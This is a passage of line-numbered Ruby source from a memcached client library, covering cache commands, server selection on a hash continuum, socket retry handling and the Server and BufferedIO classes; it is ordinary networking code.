+value+ will not be Marshalled. 460 | def replace(key, value, expiry = 0, raw = false) 461 | raise MemCacheError, "Update of readonly cache" if @readonly 462 | value = Marshal.dump value unless raw 463 | with_server(key) do |server, cache_key| 464 | logger.debug { "replace #{key} to #{server}: #{value ? value.to_s.size : 'nil'}" } if logger 465 | command = "replace #{cache_key} 0 #{expiry} #{value.to_s.size}#{noreply}\r\n#{value}\r\n" 466 | 467 | with_socket_management(server) do |socket| 468 | socket.write command 469 | break nil if @no_reply 470 | result = socket.gets 471 | raise_on_error_response! result 472 | result 473 | end 474 | end 475 | end 476 | 477 | ## 478 | # Append - 'add this data to an existing key after existing data' 479 | # Please note the value is always passed to memcached as raw since it 480 | # doesn't make a lot of sense to concatenate marshalled data together. 481 | def append(key, value) 482 | raise MemCacheError, "Update of readonly cache" if @readonly 483 | with_server(key) do |server, cache_key| 484 | logger.debug { "append #{key} to #{server}: #{value ? value.to_s.size : 'nil'}" } if logger 485 | command = "append #{cache_key} 0 0 #{value.to_s.size}#{noreply}\r\n#{value}\r\n" 486 | 487 | with_socket_management(server) do |socket| 488 | socket.write command 489 | break nil if @no_reply 490 | result = socket.gets 491 | raise_on_error_response! result 492 | result 493 | end 494 | end 495 | end 496 | 497 | ## 498 | # Prepend - 'add this data to an existing key before existing data' 499 | # Please note the value is always passed to memcached as raw since it 500 | # doesn't make a lot of sense to concatenate marshalled data together. 501 | def prepend(key, value) 502 | raise MemCacheError, "Update of readonly cache" if @readonly 503 | with_server(key) do |server, cache_key| 504 | logger.debug { "prepend #{key} to #{server}: #{value ? value.to_s.size : 'nil'}" } if logger 505 | command = "prepend #{cache_key} 0 0 #{value.to_s.size}#{noreply}\r\n#{value}\r\n" 506 | 507 | with_socket_management(server) do |socket| 508 | socket.write command 509 | break nil if @no_reply 510 | result = socket.gets 511 | raise_on_error_response! result 512 | result 513 | end 514 | end 515 | end 516 | 517 | ## 518 | # Removes +key+ from the cache. 519 | # +expiry+ is ignored as it has been removed from the latest memcached version. 520 | 521 | def delete(key, expiry = 0) 522 | raise MemCacheError, "Update of readonly cache" if @readonly 523 | with_server(key) do |server, cache_key| 524 | with_socket_management(server) do |socket| 525 | logger.debug { "delete #{cache_key} on #{server}" } if logger 526 | socket.write "delete #{cache_key}#{noreply}\r\n" 527 | break nil if @no_reply 528 | result = socket.gets 529 | raise_on_error_response! result 530 | result 531 | end 532 | end 533 | end 534 | 535 | ## 536 | # Flush the cache from all memcache servers. 537 | # A non-zero value for +delay+ will ensure that the flush 538 | # is propogated slowly through your memcached server farm. 539 | # The Nth server will be flushed N*delay seconds from now, 540 | # asynchronously so this method returns quickly. 541 | # This prevents a huge database spike due to a total 542 | # flush all at once. 543 | 544 | def flush_all(delay=0) 545 | raise MemCacheError, 'No active servers' unless active? 546 | raise MemCacheError, "Update of readonly cache" if @readonly 547 | 548 | begin 549 | delay_time = 0 550 | @servers.each do |server| 551 | with_socket_management(server) do |socket| 552 | logger.debug { "flush_all #{delay_time} on #{server}" } if logger 553 | if delay == 0 # older versions of memcached will fail silently otherwise 554 | socket.write "flush_all#{noreply}\r\n" 555 | else 556 | socket.write "flush_all #{delay_time}#{noreply}\r\n" 557 | end 558 | break nil if @no_reply 559 | result = socket.gets 560 | raise_on_error_response! result 561 | result 562 | end 563 | delay_time += delay 564 | end 565 | rescue IndexError => err 566 | handle_error nil, err 567 | end 568 | end 569 | 570 | ## 571 | # Reset the connection to all memcache servers. This should be called if 572 | # there is a problem with a cache lookup that might have left the connection 573 | # in a corrupted state. 574 | 575 | def reset 576 | @servers.each { |server| server.close } 577 | end 578 | 579 | ## 580 | # Returns statistics for each memcached server. An explanation of the 581 | # statistics can be found in the memcached docs: 582 | # 583 | # http://code.sixapart.com/svn/memcached/trunk/server/doc/protocol.txt 584 | # 585 | # Example: 586 | # 587 | # >> pp CACHE.stats 588 | # {"localhost:11211"=> 589 | # {"bytes"=>4718, 590 | # "pid"=>20188, 591 | # "connection_structures"=>4, 592 | # "time"=>1162278121, 593 | # "pointer_size"=>32, 594 | # "limit_maxbytes"=>67108864, 595 | # "cmd_get"=>14532, 596 | # "version"=>"1.2.0", 597 | # "bytes_written"=>432583, 598 | # "cmd_set"=>32, 599 | # "get_misses"=>0, 600 | # "total_connections"=>19, 601 | # "curr_connections"=>3, 602 | # "curr_items"=>4, 603 | # "uptime"=>1557, 604 | # "get_hits"=>14532, 605 | # "total_items"=>32, 606 | # "rusage_system"=>0.313952, 607 | # "rusage_user"=>0.119981, 608 | # "bytes_read"=>190619}} 609 | # => nil 610 | 611 | def stats(submenu=nil) 612 | raise MemCacheError, "No active servers" unless active? 613 | server_stats = {} 614 | 615 | @servers.each do |server| 616 | next unless server.alive? 617 | 618 | with_socket_management(server) do |socket| 619 | value = nil 620 | cmd = "stats\r\n" 621 | cmd = "stats "+submenu+"\r\n" if !submenu.nil? and submenu != "" 622 | 623 | socket.write cmd 624 | stats = {} 625 | while line = socket.gets do 626 | raise_on_error_response! line 627 | break if line == "END\r\n" 628 | if line =~ /\ASTAT ([\S]+) ([\w\.\:]+)/ then 629 | name, value = $1, $2 630 | stats[name] = case name 631 | when (value.to_i == 0 and value != 0) then 632 | value 633 | when 'rusage_user', 'rusage_system' then 634 | seconds, microseconds = value.split(/:/, 2) 635 | microseconds ||= 0 636 | Float(seconds) + (Float(microseconds) / 1_000_000) 637 | else 638 | if value =~ /\A\d+\Z/ then 639 | value.to_i 640 | else 641 | value 642 | end 643 | end 644 | end 645 | end 646 | server_stats["#{server.host}:#{server.port}"] = stats 647 | end 648 | end 649 | 650 | raise MemCacheError, "No active servers" if server_stats.empty? 651 | server_stats 652 | end 653 | 654 | ## 655 | # Shortcut to get a value from the cache. 656 | 657 | alias [] get 658 | 659 | ## 660 | # Shortcut to save a value in the cache. This method does not set an 661 | # expiration on the entry. Use set to specify an explicit expiry. 662 | 663 | def []=(key, value) 664 | set key, value 665 | end 666 | 667 | protected unless $TESTING 668 | 669 | ## 670 | # Create a key for the cache, incorporating the namespace qualifier if 671 | # requested. 672 | 673 | def make_cache_key(key) 674 | if @autofix_keys && (key =~ /\s/ || key_length(key) > 250) 675 | key = "#{Digest::SHA1.hexdigest(key)}-autofixed" 676 | end 677 | 678 | if namespace.nil? 679 | key 680 | else 681 | "#{@namespace}#{@namespace_separator}#{key}" 682 | end 683 | end 684 | 685 | ## 686 | # Calculate length of the key, including the namespace and namespace-separator. 687 | 688 | def key_length(key) 689 | key.length + (namespace.nil? ? 0 : ( namespace.length + (@namespace_separator.nil? ? 0 : @namespace_separator.length) ) ) 690 | end 691 | 692 | ## 693 | # Returns an interoperable hash value for +key+. (I think, docs are 694 | # sketchy for down servers). 695 | 696 | def hash_for(key) 697 | Zlib.crc32(key) 698 | end 699 | 700 | ## 701 | # Pick a server to handle the request based on a hash of the key. 702 | 703 | def get_server_for_key(key, options = {}) 704 | raise ArgumentError, "illegal character in key #{key.inspect}" if 705 | key =~ /\s/ 706 | raise ArgumentError, "key cannot be blank" if key.nil? || key.strip.size == 0 707 | raise ArgumentError, "key too long #{key.inspect}" if key.length > 250 708 | raise MemCacheError, "No servers available" if @servers.empty? 709 | return @servers.first if @servers.length == 1 710 | 711 | hkey = hash_for(key) 712 | 713 | 20.times do |try| 714 | entryidx = Continuum.binary_search(@continuum, hkey) 715 | server = @continuum[entryidx].server 716 | return server if server.alive? 717 | break unless failover 718 | hkey = hash_for "#{try}#{key}" 719 | end 720 | 721 | raise MemCacheError, "No servers available" 722 | end 723 | 724 | ## 725 | # Performs a raw decr for +cache_key+ from +server+. Returns nil if not 726 | # found. 727 | 728 | def cache_decr(server, cache_key, amount) 729 | with_socket_management(server) do |socket| 730 | socket.write "decr #{cache_key} #{amount}#{noreply}\r\n" 731 | break nil if @no_reply 732 | text = socket.gets 733 | raise_on_error_response! text 734 | return nil if text == "NOT_FOUND\r\n" 735 | return text.to_i 736 | end 737 | end 738 | 739 | ## 740 | # Fetches the raw data for +cache_key+ from +server+. Returns nil on cache 741 | # miss. 742 | 743 | def cache_get(server, cache_key) 744 | with_socket_management(server) do |socket| 745 | socket.write "get #{cache_key}\r\n" 746 | keyline = socket.gets # "VALUE \r\n" 747 | 748 | if keyline.nil? then 749 | server.close 750 | raise MemCacheError, "lost connection to #{server.host}:#{server.port}" 751 | end 752 | 753 | raise_on_error_response! keyline 754 | return nil if keyline == "END\r\n" 755 | 756 | unless keyline =~ /(\d+) (\d+)\r/ then 757 | server.close 758 | raise MemCacheError, "unexpected response #{keyline.inspect}" 759 | end 760 | flags = $1.to_i 761 | value = socket.read $2.to_i 762 | socket.read 2 # "\r\n" 763 | socket.gets # "END\r\n" 764 | return [flags,value] 765 | end 766 | end 767 | 768 | def gets(key, raw = false) 769 | with_server(key) do |server, cache_key| 770 | logger.debug { "gets #{key} from #{server.inspect}" } if logger 771 | result = with_socket_management(server) do |socket| 772 | socket.write "gets #{cache_key}\r\n" 773 | keyline = socket.gets # "VALUE \r\n" 774 | 775 | if keyline.nil? then 776 | server.close 777 | raise MemCacheError, "lost connection to #{server.host}:#{server.port}" 778 | end 779 | 780 | raise_on_error_response! keyline 781 | return nil if keyline == "END\r\n" 782 | 783 | unless keyline =~ /(\d+) (\w+)\r/ then 784 | server.close 785 | raise MemCacheError, "unexpected response #{keyline.inspect}" 786 | end 787 | value = socket.read $1.to_i 788 | socket.read 2 # "\r\n" 789 | socket.gets # "END\r\n" 790 | [value, $2] 791 | end 792 | result[0] = Marshal.load result[0] unless raw 793 | result 794 | end 795 | rescue TypeError => err 796 | handle_error nil, err 797 | end 798 | 799 | 800 | ## 801 | # Fetches +cache_keys+ from +server+ using a multi-get. 802 | 803 | def cache_get_multi(server, cache_keys) 804 | with_socket_management(server) do |socket| 805 | values = {} 806 | socket.write "get #{cache_keys}\r\n" 807 | 808 | while keyline = socket.gets do 809 | return values if keyline == "END\r\n" 810 | raise_on_error_response! keyline 811 | 812 | unless keyline =~ /\AVALUE (.+) (.+) (.+)/ then 813 | server.close 814 | raise MemCacheError, "unexpected response #{keyline.inspect}" 815 | end 816 | 817 | key, data_length = $1, $3 818 | values[$1] = socket.read data_length.to_i 819 | socket.read(2) # "\r\n" 820 | end 821 | 822 | server.close 823 | raise MemCacheError, "lost connection to #{server.host}:#{server.port}" # TODO: retry here too 824 | end 825 | end 826 | 827 | ## 828 | # Performs a raw incr for +cache_key+ from +server+. Returns nil if not 829 | # found. 830 | 831 | def cache_incr(server, cache_key, amount) 832 | with_socket_management(server) do |socket| 833 | socket.write "incr #{cache_key} #{amount}#{noreply}\r\n" 834 | break nil if @no_reply 835 | text = socket.gets 836 | raise_on_error_response! text 837 | return nil if text == "NOT_FOUND\r\n" 838 | return text.to_i 839 | end 840 | end 841 | 842 | ## 843 | # Gets or creates a socket connected to the given server, and yields it 844 | # to the block, wrapped in a mutex synchronization if @multithread is true. 845 | # 846 | # If a socket error (SocketError, SystemCallError, IOError) or protocol error 847 | # (MemCacheError) is raised by the block, closes the socket, attempts to 848 | # connect again, and retries the block (once). If an error is again raised, 849 | # reraises it as MemCacheError. 850 | # 851 | # If unable to connect to the server (or if in the reconnect wait period), 852 | # raises MemCacheError. Note that the socket connect code marks a server 853 | # dead for a timeout period, so retrying does not apply to connection attempt 854 | # failures (but does still apply to unexpectedly lost connections etc.). 855 | 856 | def with_socket_management(server, &block) 857 | check_multithread_status! 858 | 859 | @mutex.lock if @multithread 860 | retried = false 861 | 862 | begin 863 | socket = server.socket 864 | 865 | # Raise an IndexError to show this server is out of whack. If were inside 866 | # a with_server block, we'll catch it and attempt to restart the operation. 867 | 868 | raise IndexError, "No connection to server (#{server.status})" if socket.nil? 869 | 870 | block.call(socket) 871 | 872 | rescue SocketError, Errno::EAGAIN, Timeout::Error => err 873 | logger.warn { "Socket failure: #{err.message}" } if logger 874 | server.mark_dead(err) 875 | handle_error(server, err) 876 | 877 | rescue MemCacheError, SystemCallError, IOError => err 878 | logger.warn { "Generic failure: #{err.class.name}: #{err.message}" } if logger 879 | handle_error(server, err) if retried || socket.nil? 880 | retried = true 881 | retry 882 | end 883 | ensure 884 | @mutex.unlock if @multithread 885 | end 886 | 887 | def with_server(key) 888 | retried = false 889 | begin 890 | server, cache_key = request_setup(key) 891 | yield server, cache_key 892 | rescue IndexError => e 893 | logger.warn { "Server failed: #{e.class.name}: #{e.message}" } if logger 894 | if !retried && @servers.size > 1 895 | logger.info { "Connection to server #{server.inspect} DIED! Retrying operation..." } if logger 896 | retried = true 897 | retry 898 | end 899 | handle_error(nil, e) 900 | end 901 | end 902 | 903 | ## 904 | # Handles +error+ from +server+. 905 | 906 | def handle_error(server, error) 907 | raise error if error.is_a?(MemCacheError) 908 | server.close if server && server.status == "CONNECTED" 909 | new_error = MemCacheError.new error.message 910 | new_error.set_backtrace error.backtrace 911 | raise new_error 912 | end 913 | 914 | def noreply 915 | @no_reply ? ' noreply' : '' 916 | end 917 | 918 | ## 919 | # Performs setup for making a request with +key+ from memcached. Returns 920 | # the server to fetch the key from and the complete key to use. 921 | 922 | def request_setup(key) 923 | raise MemCacheError, 'No active servers' unless active? 924 | cache_key = make_cache_key key 925 | server = get_server_for_key cache_key 926 | return server, cache_key 927 | end 928 | 929 | def raise_on_error_response!(response) 930 | if response =~ /\A(?:CLIENT_|SERVER_)?ERROR(.*)/ 931 | raise MemCacheError, $1.strip 932 | end 933 | end 934 | 935 | def create_continuum_for(servers) 936 | total_weight = servers.inject(0) { |memo, srv| memo + srv.weight } 937 | continuum = [] 938 | 939 | servers.each do |server| 940 | entry_count_for(server, servers.size, total_weight).times do |idx| 941 | hash = Digest::SHA1.hexdigest("#{server.host}:#{server.port}:#{idx}") 942 | value = Integer("0x#{hash[0..7]}") 943 | continuum << Continuum::Entry.new(value, server) 944 | end 945 | end 946 | 947 | continuum.sort { |a, b| a.value <=> b.value } 948 | end 949 | 950 | def entry_count_for(server, total_servers, total_weight) 951 | ((total_servers * Continuum::POINTS_PER_SERVER * server.weight) / Float(total_weight)).floor 952 | end 953 | 954 | def check_multithread_status! 955 | return if @multithread 956 | return if @evented 957 | 958 | if Thread.current[:memcache_client] != self.object_id 959 | raise MemCacheError, <<-EOM 960 | You are accessing this memcache-client instance from multiple threads but have not enabled multithread support. 961 | Normally: MemCache.new(['localhost:11211'], :multithread => true) 962 | In Rails: config.cache_store = [:mem_cache_store, 'localhost:11211', { :multithread => true }] 963 | EOM 964 | end 965 | end 966 | 967 | ## 968 | # This class represents a memcached server instance. 969 | 970 | class Server 971 | 972 | ## 973 | # The amount of time to wait before attempting to re-establish a 974 | # connection with a server that is marked dead. 975 | 976 | RETRY_DELAY = 30.0 977 | 978 | ## 979 | # The host the memcached server is running on. 980 | 981 | attr_reader :host 982 | 983 | ## 984 | # The port the memcached server is listening on. 985 | 986 | attr_reader :port 987 | 988 | ## 989 | # The weight given to the server. 990 | 991 | attr_reader :weight 992 | 993 | ## 994 | # The time of next retry if the connection is dead. 995 | 996 | attr_reader :retry 997 | 998 | ## 999 | # A text status string describing the state of the server. 1000 | 1001 | attr_reader :status 1002 | 1003 | attr_reader :logger 1004 | 1005 | ## 1006 | # Create a new MemCache::Server object for the memcached instance 1007 | # listening on the given host and port, weighted by the given weight. 1008 | 1009 | def initialize(memcache, host, port = DEFAULT_PORT, weight = DEFAULT_WEIGHT) 1010 | raise ArgumentError, "No host specified" if host.nil? or host.empty? 1011 | raise ArgumentError, "No port specified" if port.nil? or port.to_i.zero? 1012 | 1013 | @host = host 1014 | @port = port.to_i 1015 | @weight = weight.to_i 1016 | 1017 | @sock = nil 1018 | @retry = nil 1019 | @status = 'NOT CONNECTED' 1020 | @timeout = memcache.timeout 1021 | @logger = memcache.logger 1022 | 1023 | self.extend(MemCache::EventedServer) if defined?(EM) and EM.reactor_running? 1024 | end 1025 | 1026 | ## 1027 | # Return a string representation of the server object. 1028 | 1029 | def inspect 1030 | "" % [@host, @port, @weight, @status] 1031 | end 1032 | 1033 | ## 1034 | # Check whether the server connection is alive. This will cause the 1035 | # socket to attempt to connect if it isn't already connected and or if 1036 | # the server was previously marked as down and the retry time has 1037 | # been exceeded. 1038 | 1039 | def alive? 1040 | !!socket 1041 | end 1042 | 1043 | ## 1044 | # Try to connect to the memcached server targeted by this object. 1045 | # Returns the connected socket object on success or nil on failure. 1046 | 1047 | def socket 1048 | return @sock if @sock and not @sock.closed? 1049 | 1050 | @sock = nil 1051 | 1052 | # If the host was dead, don't retry for a while. 1053 | return if @retry and @retry > Time.now 1054 | 1055 | # Attempt to connect if not already connected. 1056 | begin 1057 | @sock = connect_to(@host, @port, @timeout) 1058 | @sock.setsockopt Socket::IPPROTO_TCP, Socket::TCP_NODELAY, 1 1059 | @retry = nil 1060 | @status = 'CONNECTED' 1061 | rescue SocketError, SystemCallError, IOError, Timeout::Error => err 1062 | logger.warn { "Unable to open socket: #{err.class.name}, #{err.message}" } if logger 1063 | mark_dead err 1064 | end 1065 | 1066 | return @sock 1067 | end 1068 | 1069 | def connect_to(host, port, timeout=nil) 1070 | sock = nil 1071 | if timeout 1072 | MemCacheTimer.timeout(timeout) do 1073 | sock = TCPSocket.new(host, port) 1074 | end 1075 | else 1076 | sock = TCPSocket.new(host, port) 1077 | end 1078 | 1079 | io = MemCache::BufferedIO.new(sock) 1080 | io.read_timeout = timeout 1081 | # Getting reports from several customers, including 37signals, 1082 | # that the non-blocking timeouts in 1.7.5 don't seem to be reliable. 1083 | # It can't hurt to set the underlying socket timeout also, if possible. 1084 | if timeout 1085 | secs = Integer(timeout) 1086 | usecs = Integer((timeout - secs) * 1_000_000) 1087 | optval = [secs, usecs].pack("l_2") 1088 | begin 1089 | io.setsockopt Socket::SOL_SOCKET, Socket::SO_RCVTIMEO, optval 1090 | io.setsockopt Socket::SOL_SOCKET, Socket::SO_SNDTIMEO, optval 1091 | rescue Exception => ex 1092 | # Solaris, for one, does not like/support socket timeouts. 1093 | @logger.info "[memcache-client] Unable to use raw socket timeouts: #{ex.class.name}: #{ex.message}" if @logger 1094 | end 1095 | end 1096 | io 1097 | end 1098 | 1099 | ## 1100 | # Close the connection to the memcached server targeted by this 1101 | # object. The server is not considered dead. 1102 | 1103 | def close 1104 | @sock.close if @sock && !@sock.closed? 1105 | @sock = nil 1106 | @retry = nil 1107 | @status = "NOT CONNECTED" 1108 | end 1109 | 1110 | ## 1111 | # Mark the server as dead and close its socket. 1112 | 1113 | def mark_dead(error) 1114 | close 1115 | @retry = Time.now + RETRY_DELAY 1116 | 1117 | reason = "#{error.class.name}: #{error.message}" 1118 | @status = sprintf "%s:%s DEAD (%s), will retry at %s", @host, @port, reason, @retry 1119 | @logger.info { @status } if @logger 1120 | end 1121 | 1122 | end 1123 | 1124 | ## 1125 | # Base MemCache exception class. 1126 | 1127 | class MemCacheError < RuntimeError; end 1128 | 1129 | class BufferedIO < Net::BufferedIO # :nodoc: 1130 | BUFSIZE = 1024 * 16 1131 | 1132 | if RUBY_VERSION < '1.9.1' 1133 | def rbuf_fill 1134 | begin 1135 | @rbuf << @io.read_nonblock(BUFSIZE) 1136 | rescue Errno::EWOULDBLOCK 1137 | retry unless @read_timeout 1138 | if IO.select([@io], nil, nil, @read_timeout) 1139 | retry 1140 | else 1141 | raise Timeout::Error, 'IO timeout' 1142 | end 1143 | end 1144 | end 1145 | end 1146 | 1147 | def setsockopt(*args) 1148 | @io.setsockopt(*args) 1149 | end 1150 | 1151 | def gets 1152 | readuntil("\n") 1153 | end 1154 | end 1155 | 1156 | end 1157 | 1158 | module Continuum 1159 | POINTS_PER_SERVER = 160 # this is the default in libmemcached 1160 | 1161 | # Find the closest index in Continuum with value <= the given value 1162 | def self.binary_search(ary, value, &block) 1163 | upper = ary.size - 1 1164 | lower = 0 1165 | idx = 0 1166 | 1167 | while(lower <= upper) do 1168 | idx = (lower + upper) / 2 1169 | comp = ary[idx].value <=> value 1170 | 1171 | if comp == 0 1172 | return idx 1173 | elsif comp > 0 1174 | upper = idx - 1 1175 | else 1176 | lower = idx + 1 1177 | end 1178 | end 1179 | return upper 1180 | end 1181 | 1182 | class Entry 1183 | attr_reader :value 1184 | attr_reader :server 1185 | 1186 | def initialize(val, srv) 1187 | @value = val 1188 | @server = srv 1189 | end 1190 | 1191 | def inspect 1192 | "<#{value}, #{server.host}:#{server.port}>" 1193 | end 1194 | end 1195 | 1196 | end 1197 | require 'continuum_native' 1198 | --------------------------------------------------------------------------------